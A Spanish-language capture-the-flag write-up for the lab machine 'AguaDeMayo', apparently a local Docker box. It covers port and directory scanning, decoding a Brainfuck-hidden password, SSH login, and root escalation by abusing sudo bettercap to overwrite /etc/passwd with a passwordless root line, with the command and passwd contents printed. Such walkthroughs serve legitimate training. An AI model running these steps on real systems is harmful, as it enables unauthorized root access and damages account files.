> For the complete documentation index, see [llms.txt](https://shinki-organization.gitbook.io/dw/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://shinki-organization.gitbook.io/dw/write-ups/quickstart/maquinas-faciles/aguademayo-write-up.md).

# AguaDeMayo write-up

## **Verificamos conexión con la máquina víctima**

<figure><img src="/files/2Ra014XbwAS0NS6d6C0I" alt=""><figcaption></figcaption></figure>

## **Escaneo de los puertos abiertos de la máquina víctima**

Utilizamos **nmap** para escanear los puertos abiertos de la máquina víctima con el siguiente comando:

```bash
sudo nmap -p- -sCVS --min-rate=5000 -vvv -Pn -n -O 172.17.0.2
```

<figure><img src="/files/NigB6GD79HGRJr8Y7hS9" alt=""><figcaption></figcaption></figure>

Esto indica que el puerto 22 (SSH) y el 80 (HTTP) están abiertos. Así que ingresamos la IP de la máquina víctima en el navegador y observamos lo siguiente:

<figure><img src="/files/HAyiHybwkBQmtBZhPP8t" alt=""><figcaption></figcaption></figure>

Parece que la página mostrada es la configuración por defecto de **Apache**, pero si nos vamos al código fuente encontramos lo siguiente:

<figure><img src="/files/ykyrAnEYGrnnIUqucO3c" alt=""><figcaption></figcaption></figure>

Esto parece estar encriptado en **Brainfuck**, así que vamos a usar una página para desencriptarla.

<figure><img src="/files/58FWSP0MXv70UwdOSZmS" alt=""><figcaption></figcaption></figure>

Esto nos indica que `bebeaguaqueessano` corresponde con el texto encriptado. Ahora vamos a buscar directorios ocultos con la herramienta llamada **gobuster** con el siguiente comando:

```bash
gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html,php,py
```

<figure><img src="/files/Tm7Hqmq5pxcgMmH8GM4t" alt=""><figcaption></figcaption></figure>

Esto indica que existe un directorio llamado `/images`, así que introducimos esa dirección en el navegador y observamos lo siguiente:

<figure><img src="/files/r9SpYMrmxipH9WRYMqaV" alt=""><figcaption></figcaption></figure>

Vemos que hay una imagen, que tiene de nombre `agua_ssh`, así que vamos a probar a iniciar sesión en la máquina víctima con el usuario `agua` y contraseña `bebeaguaqueessano`.

<figure><img src="/files/U4PmxYLGEkQlOhoV5ocd" alt=""><figcaption></figcaption></figure>

Y ya estaríamos dentro de la máquina víctima como el usuario agua.

## **Escalada de privilegios**

Una vez dentro de la máquina víctima, ejecutamos el comando `sudo -l`, el cual nos indica que podemos ejecutar el binario `/usr/bin/bettercap` como usuario root. Así que lo ejecutamos como usuario root de la siguiente manera:

<figure><img src="/files/sqF6otoxzQ5y0jOdejJf" alt=""><figcaption></figcaption></figure>

```bash
sudo /usr/bin/bettercap
```

Y ahora vamos a ejecutar lo siguiente para quitar la contraseña al usuario root:

```bash
!echo root::0:0:root:/root:/bin/bash > /etc/passwd
```

<figure><img src="/files/RVgjtC2oSb5Vbv2VBBpQ" alt=""><figcaption></figcaption></figure>

Y ya podríamos iniciar sesión como usuario root si necesidad de contraseña.

<figure><img src="/files/sS9WqL3xuzjqfeFsmCIn" alt=""><figcaption></figcaption></figure>

Incluso podríamos restaurar el fichero `/etc/passwd` para que no hubiese problemas con los demás usuarios.

```plaintext
root::0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
agua:x:1000:1000::/home/agua:/bin/bash
_lxd:x:102:104::/var/lib/lxd/:/bin/false
dnsmasq:x:103:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
```

<figure><img src="/files/yHeHx4kcjoW9rG6c3ej8" alt=""><figcaption></figcaption></figure>
